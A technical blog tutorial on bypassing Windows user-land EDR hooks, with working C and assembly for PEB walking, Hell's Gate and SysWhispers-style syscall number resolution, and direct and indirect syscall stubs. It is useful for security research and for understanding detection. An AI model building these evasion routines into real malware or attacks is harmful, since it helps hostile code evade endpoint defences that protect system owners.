Using syscalls to bypass User-land EDR hooks
My last post discussed syscalls in Windows and how they form a bridge between user mode and kernel mode. Many EDR solutions seek to monitor this bridge by hooking user-land functions, in an attempt to control the syscalls that follow.
But what if we could bypass all of that with our own syscalls? That way, we don’t need to call any of the user-land functions, and yet achieve the same results.
This post discusses the concepts of direct and indirect syscalls, and showcases how to use this idea to bypass user-land EDR hooks.
How EDR hooks work
If you are not familiar with WinAPI hooks, check out one of my previous posts: API hooking with Detours on Windows.
The idea is simple: replace the first few bytes of a WinAPI function with a jmp XXXXXXXX instruction that redirects execution to a hook function of our choice. EDRs may do the same to monitor function invocations, and optionally halt execution and raise an alert if anything looks suspicious.
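To make the jmp XXXXXXXX part concrete, here is a minimal sketch of how the five bytes of a relative jump could be computed. It assumes the common E9 rel32 encoding; EncodeJmpRel32 is a hypothetical helper name, and real hooking engines (Detours included) do more work, such as relocating the overwritten instructions into a trampoline.

```c
#include <stdint.h>

#define JMP_REL32_SIZE 5 /* 1 opcode byte (E9) + 4 displacement bytes */

/*
 * Hypothetical helper: encode "jmp rel32" into patch[0..4].
 * src is the address where the jmp will be written, dst is the hook function.
 * Returns 0 on success, -1 if dst is too far away for a 32-bit displacement.
 */
int EncodeJmpRel32(uint8_t patch[JMP_REL32_SIZE], uint64_t src, uint64_t dst) {
    /* The displacement is measured from the end of the jmp instruction */
    int64_t disp = (int64_t)(dst - (src + JMP_REL32_SIZE));
    if (disp > INT32_MAX || disp < INT32_MIN) {
        return -1;
    }
    uint32_t rel = (uint32_t)(int32_t)disp;
    patch[0] = 0xE9;                  /* jmp rel32 opcode */
    patch[1] = (uint8_t)(rel);        /* displacement, little-endian */
    patch[2] = (uint8_t)(rel >> 8);
    patch[3] = (uint8_t)(rel >> 16);
    patch[4] = (uint8_t)(rel >> 24);
    return 0;
}
```

Since the patch is five bytes long, it overwrites the start of the function, which matters later when we try to read the original bytes back.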
The whole idea behind using syscalls to bypass these hooks is to construct our own syscalls. We would then no longer need to invoke any of the hooked WinAPIs, and would thus stay stealthy.
If you don’t know how syscalls work and why they even exist, check out my last post — A Gentle Introduction to Syscalls in Windows.
All that remains is to find the system service numbers (SSNs) of the syscalls we need, then perform those syscalls ourselves.
Finding out SSNs statically
SSNs of the same syscalls may vary between different Windows versions. To statically derive these values, there are two approaches—
- Parse the target DLL from disk, seek to the target exported function, then read off the SSN value from the opcodes. You could either do this on the target itself, or get the DLL from an installed copy of the same version of Windows and load it in a disassembler.
- With knowledge of the target’s Windows version, find out the SSN from some catalogue of SSNs meant for that particular version. An excellent resource for this is — https://github.com/j00ru/windows-syscalls.
The first approach is similar to the “Hell’s Gate” approach described below, so it is explained there.
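One detail differs when the DLL is parsed from disk rather than from memory: the export directory stores RVAs, which are only valid as offsets once the image is mapped. On a raw file they first have to be translated through the section table. A minimal sketch of that translation follows; SectionInfo is a hypothetical trimmed-down stand-in for the real section header, keeping only the fields needed here.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, trimmed-down view of a PE section header */
typedef struct {
    uint32_t virtualAddress;   /* RVA where the section is mapped in memory */
    uint32_t pointerToRawData; /* Offset of the section's bytes in the file */
    uint32_t sizeOfRawData;    /* Number of section bytes present in the file */
} SectionInfo;

/* Translate an RVA to a file offset; returns 0 if no section's raw data covers it */
uint32_t RvaToFileOffset(const SectionInfo* sections, size_t count, uint32_t rva) {
    for (size_t i = 0; i < count; i++) {
        uint32_t start = sections[i].virtualAddress;
        if (rva >= start && (rva - start) < sections[i].sizeOfRawData) {
            /* Same distance from the section start, but measured in the file */
            return sections[i].pointerToRawData + (rva - start);
        }
    }
    return 0;
}
```

With this in place, every RVA read from the headers (export directory, name table, function table) would go through RvaToFileOffset before being used as an index into the file buffer.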
Finding out SSNs at runtime
From the last section, it’s obvious that there’s a caveat to finding SSNs statically: if you need to target a new version of Windows, its SSNs might not be in any repository yet.
Since you can’t rely on hardcoded SSNs, you will need to find out the SSNs at runtime.
Prerequisite — getting a handle to target DLLs in memory
Both the approaches to be discussed rely on getting a handle to the target DLL first, and then getting the pointer to the target function.
You can’t use the trivial GetModuleHandle and GetProcAddress approach because, remember, you’re trying to use only syscalls for all executions.
For the GetModuleHandle part, you can write your own custom function that does the same. A module handle is simply the memory address where the module is loaded. As it happens, a process’s PEB contains a linked list of loaded DLLs (in the Ldr field, according to MSDN). Each item on that list is an LDR_DATA_TABLE_ENTRY object (https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/ntldr/ldr_data_table_entry.htm) describing one loaded DLL. And yes, it contains a pointer to the loaded DLL’s base address, which is the handle we want.
As for the GetProcAddress part, once you have the base of the target DLL, treat it as a pointer to a PE image and parse the appropriate headers to get a pointer to the export directory, which in turn points you towards the exported functions.
Now all this is theoretical. Here’s a snippet of my code for a custom implementation of GetModuleHandle and GetProcAddress.
void RtlZeroMemoryCustom(IN PBYTE pBuf, IN DWORD bufSize) {
for (int i = 0; i < bufSize; i++) {
pBuf[i] = 0;
}
}
void WideStringToLower(IN PWCHAR strIn, IN OUT PWCHAR strOut) {
// Iterate over characters, not bytes; the caller is expected to pre-zero strOut
int stringLenChars = lstrlenW(strIn);
for (int i = 0; i < stringLenChars; i++) {
strOut[i] = towlower(strIn[i]);
}
}
void AsciiToWideString(IN PCHAR strIn, OUT PWCHAR strOut) {
mbstate_t state;
SIZE_T strInLen = strlen(strIn);
SIZE_T retVal = 0;
memset(&state, 0, sizeof(state));
// The destination size is given in wide characters (including the terminator), not bytes
mbsrtowcs_s(&retVal, strOut, strInLen + 1, &strIn, strInLen, &state);
}
HMODULE GetModuleHandleCustom(PCHAR moduleName) {
// Get PEB from GS register (for x64) or FS register (for x86)
#ifdef _WIN64
PPEB pPeb = (PVOID)(__readgsqword(12 * sizeof(PVOID)));
#elif _WIN32
PPEB pPeb = (PVOID)(__readfsdword(12 * sizeof(PVOID)));
#endif
// Convert module name from ASCII to Unicode lower
WCHAR moduleNameW[MAX_PATH * sizeof(WCHAR)];
WCHAR moduleNameWLower[MAX_PATH];
AsciiToWideString(moduleName, moduleNameW);
RtlZeroMemoryCustom((PBYTE)moduleNameWLower, sizeof(moduleNameWLower)); // Size in bytes, so the whole buffer is cleared
WideStringToLower(moduleNameW, moduleNameWLower);
// Cycle through modules and select the necessary one
WCHAR dllNameCurrLower[MAX_PATH];
LIST_ENTRY listEntry = pPeb->Ldr->InMemoryOrderModuleList;
PLDR_DATA_TABLE_ENTRY pDataTableEntry = listEntry.Flink;
PLDR_DATA_TABLE_ENTRY pDataTableEntryFirst = listEntry.Flink;
while (TRUE) {
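// If current module's name matches, return address to it.
// Note: pDataTableEntry points at InMemoryOrderLinks, i.e. two pointers into the real
// LDR_DATA_TABLE_ENTRY. Through this shifted view, FullDllName aliases BaseDllName
// and Reserved2[0] aliases DllBase.
RtlZeroMemoryCustom((PBYTE)dllNameCurrLower, sizeof(dllNameCurrLower));
WideStringToLower(pDataTableEntry->FullDllName.Buffer, dllNameCurrLower);
if (lstrcmpW(dllNameCurrLower, moduleNameWLower) == 0) {
return (HMODULE)pDataTableEntry->Reserved2[0];
}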
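// Move to next entry
pDataTableEntry = (PLDR_DATA_TABLE_ENTRY)pDataTableEntry->Reserved1[0];
// Stop at the list head (a bare LIST_ENTRY inside PEB_LDR_DATA, not a module),
// or once we wrap around to the first element of the circular linked list
if ((PVOID)pDataTableEntry == (PVOID)&pPeb->Ldr->InMemoryOrderModuleList || pDataTableEntry == pDataTableEntryFirst) {
break;
}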
}
// If execution comes here, it means module was not found
return NULL;
}
PVOID GetProcAddressCustom(HMODULE hModule, PCHAR procName) {
// Get export data directory
PBYTE pModuleBase = (PBYTE)hModule;
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule;
PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)(pModuleBase + pDosHeader->e_lfanew);
PIMAGE_EXPORT_DIRECTORY pDirectoryExport = (PIMAGE_EXPORT_DIRECTORY)(pModuleBase + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
PDWORD pAddressOfNames = (PDWORD)(pModuleBase + pDirectoryExport->AddressOfNames);
PWORD pAddressOfOrdinals = (PWORD)(pModuleBase + pDirectoryExport->AddressOfNameOrdinals);
PDWORD pAddressOfFunctions = (PDWORD)(pModuleBase + pDirectoryExport->AddressOfFunctions);
// Walk the name table; forwarded exports are not resolved here
for (DWORD i = 0; i < pDirectoryExport->NumberOfNames; i++) {
PCHAR procNameCurr = (PCHAR)(pModuleBase + pAddressOfNames[i]);
if (strcmp(procNameCurr, procName) == 0) {
return (PVOID)(pModuleBase + pAddressOfFunctions[pAddressOfOrdinals[i]]);
}
}
return NULL;
}
Hell’s Gate approach
Whether by parsing the PE structure of the target DLL on disk, or parsing the loaded instance of the DLL in memory, it’s possible to find out the SSNs.
The mov eax, 55 instruction in the above example is the instruction that moves the SSN into eax. Hence the SSN for nt!NtCreateFile is 0x55.
This is the Hell’s Gate approach — just parse the PE and read off the SSN from the opcodes.
The code below shows two ways of doing this.
- You can anchor on the mov r10, rcx instruction and search forward for the mov eax, XX instruction, then read the XX.
- Or, you can anchor on syscall (or int 2E) and search backwards for the same mov eax, XX instruction.
void GetSsnFromSyscallFunctionHellsGate(IN PVOID pFunc, OUT PWORD pSsn, OUT PVOID pSyscall) {
DWORD32 searchAnchorBase = 0; // Start offset of pattern checking
/*
* APPROACH ONE
mov r10,rcx # 4C 8BD1 # <-- Search anchor
mov eax,18 # B8 18000000 # <-- Search target
test byte ptr ds:[7FFE0308],1 # F60425 0803FE7F 01
jne ntdll.7FFDA6150435 # 75 03
syscall # 0F05
ret # C3
int 2E # CD 2E
ret # C3
*/
while (1) {
// Perform pattern matching
if (
(GetByteAtAddress(pFunc, searchAnchorBase + 0) == 0x4C && GetByteAtAddress(pFunc, searchAnchorBase + 1) == 0x8B && GetByteAtAddress(pFunc, searchAnchorBase + 2) == 0xD1) && // mov r10,rcx # 4C 8BD1
(GetByteAtAddress(pFunc, searchAnchorBase + 3) == 0xB8) && // mov eax,18 # B8 XXXXXXXX
(GetByteAtAddress(pFunc, searchAnchorBase + 18) == 0x0F && GetByteAtAddress(pFunc, searchAnchorBase + 19) == 0x05) && // syscall # 0F05
(GetByteAtAddress(pFunc, searchAnchorBase + 20) == 0xC3) // ret # C3
) {
*pSsn = GetWordAtAddress(pFunc, searchAnchorBase + 4);
#ifdef _M_X64
* (DWORD64*)pSyscall = GetAddressAfterOffset(pFunc, searchAnchorBase + 18);
#else
* (DWORD32*)pSyscall = GetAddressAfterOffset(pFunc, searchAnchorBase + 18);
#endif
return;
}
// Break if return is reached
if (GetByteAtAddress(pFunc, searchAnchorBase + 0) == 0xC3) {
break;
}
// Proceed to search from next byte
searchAnchorBase += 1;
}
#ifdef _M_X64
if (*(DWORD64*)pSyscall != NULL) return; // If Approach 1 worked, return
#else
if (*(DWORD32*)pSyscall != NULL) return; // If Approach 1 worked, return
#endif
/*
* APPROACH TWO
mov r10,rcx # 4C 8BD1
mov eax,18 # B8 18000000 # <-- Search target
test byte ptr ds:[7FFE0308],1 # F60425 0803FE7F 01
jne ntdll.7FFDA6150435 # 75 03
syscall # 0F05 # <-- Search anchor
ret # C3
int 2E # CD 2E # <-- Search anchor
ret # C3
*/
searchAnchorBase = 0;
while (1) {
// First anchor on syscall or int
if (
(GetByteAtAddress(pFunc, searchAnchorBase + 0) == 0x0F && GetByteAtAddress(pFunc, searchAnchorBase + 1) == 0x05) || // syscall # 0F05
(GetByteAtAddress(pFunc, searchAnchorBase + 0) == 0xCD && GetByteAtAddress(pFunc, searchAnchorBase + 1) == 0x2E) // int 2E # CD 2E
) {
// Then traverse backwards till ret of previous function while trying to find "mov eax"
DWORD32 searchAnchorBase2 = searchAnchorBase - 1;
while (1) {
if (GetByteAtAddress(pFunc, searchAnchorBase2 + 0) == 0xB8) { // mov eax,18 # B8 18000000
*pSsn = GetWordAtAddress(pFunc, searchAnchorBase2 + 1);
#ifdef _M_X64
* (DWORD64*)pSyscall = (PVOID)((DWORD64)pFunc + searchAnchorBase + 0);
#else
* (DWORD32*)pSyscall = (PVOID)((DWORD32)pFunc + searchAnchorBase + 0);
#endif
return;
}
// Break if beginning of the function is reached
if (searchAnchorBase2 == 0) {
break;
}
// Proceed to search from previous byte
searchAnchorBase2 -= 1;
}
}
// Break if return is reached
if (GetByteAtAddress(pFunc, searchAnchorBase + 0) == 0xC3) {
break;
}
// Proceed to search from next byte
searchAnchorBase += 1;
}
}
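The function above relies on three small helpers (GetByteAtAddress, GetWordAtAddress and GetAddressAfterOffset) that are not shown in this post. The following is a portable sketch of what they could look like, written against plain C types rather than the Windows ones, so the signatures are assumptions. kSampleStub is a hypothetical buffer holding the same bytes as the stub in the comments above, handy for trying the offsets out without touching ntdll.

```c
#include <stdint.h>

/* Read a single byte at pBase + offset */
uint8_t GetByteAtAddress(const void* pBase, uint32_t offset) {
    return ((const uint8_t*)pBase)[offset];
}

/* Read a little-endian 16-bit value at pBase + offset, byte by byte (no alignment needed) */
uint16_t GetWordAtAddress(const void* pBase, uint32_t offset) {
    const uint8_t* p = (const uint8_t*)pBase + offset;
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Return the address that lies offset bytes after pBase */
uintptr_t GetAddressAfterOffset(const void* pBase, uint32_t offset) {
    return (uintptr_t)pBase + offset;
}

/* Hypothetical sample: the unhooked stub layout from the comments above */
static const uint8_t kSampleStub[] = {
    0x4C, 0x8B, 0xD1,                               /* mov r10, rcx          */
    0xB8, 0x18, 0x00, 0x00, 0x00,                   /* mov eax, 18           */
    0xF6, 0x04, 0x25, 0x08, 0x03, 0xFE, 0x7F, 0x01, /* test byte ptr [...],1 */
    0x75, 0x03,                                     /* jne                   */
    0x0F, 0x05,                                     /* syscall               */
    0xC3,                                           /* ret                   */
    0xCD, 0x2E,                                     /* int 2E                */
    0xC3                                            /* ret                   */
};
```

On this sample, the SSN sits at offset 4 and the syscall opcode at offset 18, which are the offsets the pattern match in approach one uses.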
Hell’s Gate is not just about parsing the correct SSN. The second half is about executing a syscall with the found SSN, which is shown in the “Executing syscalls ourselves” section below.
Syswhispers approach
Here’s the caveat with the previous approach: you won’t find the SSN in the opcode there if the opcode itself does not exist. How? Remember EDR hooks? EDRs may just move the mov eax, XX instruction to the hook function, thus maintaining complete functionality while deterring attempts to parse the mov opcode. Or they may just leave it there, but since the first few opcodes are replaced with a hook jump, your pattern-matching attempts may fail.
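A quick way to tell whether pattern matching is even worth attempting is to check if the stub still starts with the expected bytes. The sketch below assumes the x64 stub layout seen earlier (mov r10, rcx followed by mov eax, imm32); IsStubLikelyHooked is a hypothetical helper name, and a mismatch only suggests a hook, it does not prove one.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical helper: returns 1 if the first bytes of a syscall stub do not
 * match the expected unhooked x64 prologue "4C 8B D1 B8", 0 if they do.
 * Buffers that are too short to judge are reported as 1 (not trustworthy).
 */
int IsStubLikelyHooked(const uint8_t* stub, size_t len) {
    static const uint8_t expected[] = { 0x4C, 0x8B, 0xD1, 0xB8 };
    if (len < sizeof(expected)) {
        return 1;
    }
    for (size_t i = 0; i < sizeof(expected); i++) {
        if (stub[i] != expected[i]) {
            return 1; /* e.g. an E9 (jmp rel32) placed at the start by a hook */
        }
    }
    return 0;
}
```

If this check reports a likely hook, reading the SSN from the opcodes is unreliable and a different strategy is needed.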
One of the Syswhispers approaches takes a different route. Thing is, if you extracted all the syscall function addresses (for example, functions that start with Nt in ntdll.dll), sorted them by address, and placed them in an array, the array indices would correspond to the SSNs. As an example, if the function address for NtCreateFile is at index 0x55, its SSN would also be 0x55.
It’s possible to use the running process’s PEB to get a list of loaded DLLs, and then use that list to get the function addresses and names. We could then filter the function names, select only the ones starting with Nt (or Zw), sort their addresses ourselves, and locate the target function’s address in the sorted array. The located index would be the SSN.
The below code shows this approach.
void GetSsnFromSyscallFunctionSyswhispersSortedFunctions(HMODULE IN hModule, IN PVOID pFunc, OUT PWORD pSsn, OUT PVOID pSyscall) {
// Get function addresses of module that contains target function
PBYTE pModuleBase = (PBYTE)hModule;
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule;
PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)(pModuleBase + pDosHeader->e_lfanew);
PIMAGE_EXPORT_DIRECTORY pDirectoryExport = (PIMAGE_EXPORT_DIRECTORY)(pModuleBase + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Filter above functions for names starting with "Zw"
PDWORD pAddressOfFunctions = (pModuleBase + (pDirectoryExport->AddressOfFunctions));
PDWORD pAddressOfNames = (pModuleBase + (pDirectoryExport->AddressOfNames));
PWORD pAddressOfOrdinals = (pModuleBase + (pDirectoryExport->AddressOfNameOrdinals));
PVOID pAddressOfFunctionsFiltered = malloc(sizeof(PVOID) * pDirectoryExport->NumberOfNames);
if (pAddressOfFunctionsFiltered == NULL) return;
DWORD numberOfFunctionsZw = 0;
for (DWORD i = 0; i < pDirectoryExport->NumberOfNames; i++) {
PCHAR procNameCurr = pModuleBase + pAddressOfNames[i];
if (procNameCurr[0] == 'Z' && procNameCurr[1] == 'w') {
#ifdef _M_X64
((DWORD64*)pAddressOfFunctionsFiltered)[numberOfFunctionsZw++] = (PVOID)(pModuleBase + pAddressOfFunctions[pAddressOfOrdinals[i]]);
#else
((DWORD32*)pAddressOfFunctionsFiltered)[numberOfFunctionsZw++] = (PVOID)(pModuleBase + pAddressOfFunctions[pAddressOfOrdinals[i]]);
#endif
}
}
// Sort above filtered function addresses
PVOID pAddressOfFunctionsFilteredSorted = malloc(sizeof(PVOID)* numberOfFunctionsZw);
if (pAddressOfFunctionsFilteredSorted == NULL) {
free(pAddressOfFunctionsFiltered); // Don't leak the first buffer on failure
return;
}
SortIntegersArrayDWORD64(pAddressOfFunctionsFiltered, pAddressOfFunctionsFilteredSorted, numberOfFunctionsZw);
// Search for target function; the index found is the required target SSN
DWORD funcIndex = -1;
for (DWORD i = 0; i < numberOfFunctionsZw; i++) {
#ifdef _M_X64
if (((DWORD64*)pAddressOfFunctionsFilteredSorted)[i] == pFunc) {
#else
if (((DWORD32*)pAddressOfFunctionsFilteredSorted)[i] == pFunc) {
#endif
funcIndex = i;
break;
}
}
if (funcIndex != (DWORD)-1) {
*pSsn = (WORD)funcIndex;
// Get the Syscall address too
GetSyscallAddress(pFunc, pSyscall);
}
// Cleanup (reached whether or not the function was found)
free(pAddressOfFunctionsFiltered);
free(pAddressOfFunctionsFilteredSorted);
}
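The sorting helper used above, SortIntegersArrayDWORD64, is not shown in this post. Here is a minimal sketch of what it could look like using the standard qsort, together with the index lookup that yields the SSN. It is written against plain C types and assumes 64-bit addresses; FindIndexInSorted is a hypothetical name for the search loop.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* qsort comparator for unsigned 64-bit values (avoids overflow from subtraction) */
static int CompareU64(const void* a, const void* b) {
    uint64_t x = *(const uint64_t*)a;
    uint64_t y = *(const uint64_t*)b;
    return (x > y) - (x < y);
}

/* Copy pIn into pOut and sort pOut in ascending order; pIn is left untouched */
void SortIntegersArrayDWORD64(const uint64_t* pIn, uint64_t* pOut, uint32_t count) {
    memcpy(pOut, pIn, (size_t)count * sizeof(uint64_t));
    qsort(pOut, count, sizeof(uint64_t), CompareU64);
}

/* Return the index of target in the sorted array (the would-be SSN), or -1 if absent */
int32_t FindIndexInSorted(const uint64_t* pSorted, uint32_t count, uint64_t target) {
    for (uint32_t i = 0; i < count; i++) {
        if (pSorted[i] == target) {
            return (int32_t)i;
        }
    }
    return -1;
}
```

Because the result depends only on the relative order of the stub addresses, it keeps working even when the bytes inside a stub have been overwritten by a hook.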
Executing syscalls ourselves
Direct syscalls
Now that we have an SSN, the next step is to execute a syscall. This requires some low-level assembly.
In the opcodes prior to the actual syscall, some register transfers were observed. Notably, rcx was moved to r10. According to the x64 fastcall calling convention, rcx holds the first parameter of a function call. We could write a function that executes a syscall and takes the SSN as its first argument. But that would mess up the syscall, which expects the first parameter to be the actual first parameter meant for the syscall itself. We could pass the SSN as the last argument instead. But this would require a separate custom function for each syscall, since syscall functions all have different numbers and types of arguments.
This is where the second half of the Hell’s Gate technique comes in. Instead of doing the syscall directly in one function, we split it in two. The first function stages the input parameter SSN by storing it in a global variable. The second function is the one actually responsible for the syscall, and reads the SSN from that variable instead of relying on it being passed as a function call parameter. This way, we can make a custom generic syscall wrapper for any arbitrary syscall function.
Here’s what I mean, in code:
.data
ssn DWORD 000h
.code
StageSyscall PROC
mov ssn, ecx
ret
StageSyscall ENDP
PerformSyscall PROC
mov r10, rcx
mov eax, ssn
syscall
ret
PerformSyscall ENDP
End
StageSyscall saves the input parameter from ecx in the global variable ssn. And then PerformSyscall does the actual syscall by replicating the syscall functions we disassembled before.
Here’s how a nt!NtWaitForSingleObject syscall can be executed with the above two functions:
// Wait for thread to finish
/*
NTSTATUS NtWaitForSingleObject(
[in] HANDLE Handle,
[in] BOOLEAN Alertable,
[in] PLARGE_INTEGER Timeout
);
*/
StageSyscall(ssnNtWaitForSingleObject);
status = PerformSyscall(
hThread,
FALSE,
NULL
);
Indirect syscalls
There’s one caveat with the previous approach. The syscall is executed straight from your own code, which doesn’t happen normally. EDR products monitor callstacks. If they see that the syscall did not come from, say, ntdll but rather from main, they raise alerts.
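As a rough illustration of the kind of check involved, the sketch below tests whether an address (for example, the location a syscall was issued from) falls inside a given module’s mapped range. IsAddressInModule is a hypothetical helper, and the addresses used with it are made up; real EDR logic is considerably more involved than a single range comparison.

```c
#include <stdint.h>

/*
 * Hypothetical helper: returns 1 if addr lies within [base, base + size),
 * i.e. inside the mapped image of a module such as ntdll, and 0 otherwise.
 */
int IsAddressInModule(uint64_t addr, uint64_t base, uint64_t size) {
    /* Comparing the distance from base avoids overflow in base + size */
    return addr >= base && (addr - base) < size;
}
```

A syscall instruction located in your own executable fails this test for ntdll’s range, which is exactly what makes direct syscalls stand out.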
This check can be defeated by not executing syscall ourselves, but instead jumping to a memory location that already contains the syscall opcode. And where are such memory locations? In every syscall function, like ntdll!NtCreateFile.
An indirect syscall is exactly this. Instead of executing syscall ourselves, we simply jump to an address that holds the syscall opcode. Given the target function’s address, we can parse it to extract the syscall address.
void GetSyscallAddress(IN PVOID pFunc, OUT PVOID pSyscall) {
DWORD32 searchAnchorBase = 0; // Start offset of pattern checking
/*
syscall # 0F05 # <-- Search target
ret # C3
*/
while (1) {
// Perform pattern matching
if (
(GetByteAtAddress(pFunc, searchAnchorBase + 0) == 0x0F && GetByteAtAddress(pFunc, searchAnchorBase + 1) == 0x05) // syscall # 0F05
) {
#ifdef _M_X64
* (DWORD64*)pSyscall = (PVOID)((DWORD64)pFunc + searchAnchorBase + 0);
#else
* (DWORD32*)pSyscall = (PVOID)((DWORD32)pFunc + searchAnchorBase + 0);
#endif
return;
}
// Break if return is reached
if (GetByteAtAddress(pFunc, searchAnchorBase + 0) == 0xC3) {
break;
}
// Proceed to search from next byte
searchAnchorBase += 1;
}
}
As an example, using the above function on 0x7FF8A8DB0BC0 here (beginning of NtCreateFile) would yield 0x7FF8A8DB0BD2 (the address containing the syscall opcode).
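The arithmetic behind that example can be checked on a plain byte buffer. The sketch below assumes the stub at that address has the unhooked layout shown earlier, with the NtCreateFile SSN of 0x55; FindSyscallOffset and kNtCreateFileStubSample are hypothetical names, and the buffer is a hand-written sample rather than bytes read from a live ntdll.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical sample of an unhooked x64 stub, using SSN 0x55 */
static const uint8_t kNtCreateFileStubSample[] = {
    0x4C, 0x8B, 0xD1,                               /* mov r10, rcx          */
    0xB8, 0x55, 0x00, 0x00, 0x00,                   /* mov eax, 55           */
    0xF6, 0x04, 0x25, 0x08, 0x03, 0xFE, 0x7F, 0x01, /* test byte ptr [...],1 */
    0x75, 0x03,                                     /* jne                   */
    0x0F, 0x05,                                     /* syscall               */
    0xC3                                            /* ret                   */
};

/*
 * Return the offset of the first "0F 05" (syscall) pair in the stub,
 * or -1 if a ret (C3) or the end of the buffer is reached first.
 */
long FindSyscallOffset(const uint8_t* stub, size_t len) {
    for (size_t i = 0; i + 1 < len; i++) {
        if (stub[i] == 0x0F && stub[i + 1] == 0x05) {
            return (long)i;
        }
        if (stub[i] == 0xC3) {
            break;
        }
    }
    return -1;
}
```

On this sample the offset comes out as 18 (0x12), and 0x7FF8A8DB0BC0 + 0x12 is 0x7FF8A8DB0BD2, matching the addresses quoted above.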
Now all that we have to do is modify the assembly from the “Direct syscalls” section and replace the syscall instruction with a jmp XXXXXXXX instruction. The syscall address can be staged in StageIndirectSyscall itself, along with the ssn.
.data
ssn DWORD 000h
syscallAddr QWORD 000h
.code
StageIndirectSyscall PROC
mov ssn, ecx
mov syscallAddr, rdx
ret
StageIndirectSyscall ENDP
PerformIndirectSyscall PROC
mov r10, rcx
mov eax, ssn
jmp syscallAddr
ret
PerformIndirectSyscall ENDP
End
Based on this, this is how you would invoke nt!NtWaitForSingleObject.
// Wait for thread to finish
/*
NTSTATUS NtWaitForSingleObject(
[in] HANDLE Handle,
[in] BOOLEAN Alertable,
[in] PLARGE_INTEGER Timeout
);
*/
StageIndirectSyscall(ssnNtWaitForSingleObject, pSyscall);
status = PerformIndirectSyscall(
hThread,
FALSE,
NULL
);
This time, the callstack will show that the syscall came from ntdll instead of main, because it did.
A demo — shellcode injection via new thread
Putting all the above concepts and code together, we can come up with a simple POC that executes a shellcode with syscalls. Here’s my attempt.
The shellcode I used just pops up the calculator.
Conclusion
WinAPIs abstract away all syscalls from you, so there’s no legitimate use for custom syscalls other than scenarios where you cannot rely on these WinAPIs, such as developing defensive or offensive tooling to validate the security posture of a system.
Earlier, security vendors used to hook kernel-mode routines themselves. However, Microsoft pushed them out with PatchGuard. And after the recent CrowdStrike incident, Microsoft plans to push security vendors even further away from the kernel.
References
- https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/glimpse-into-ssdt-in-windows-x64-kernel
- https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf
- https://github.com/j00ru/windows-syscalls
- https://learn.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb
- https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/ntldr/ldr_data_table_entry.htm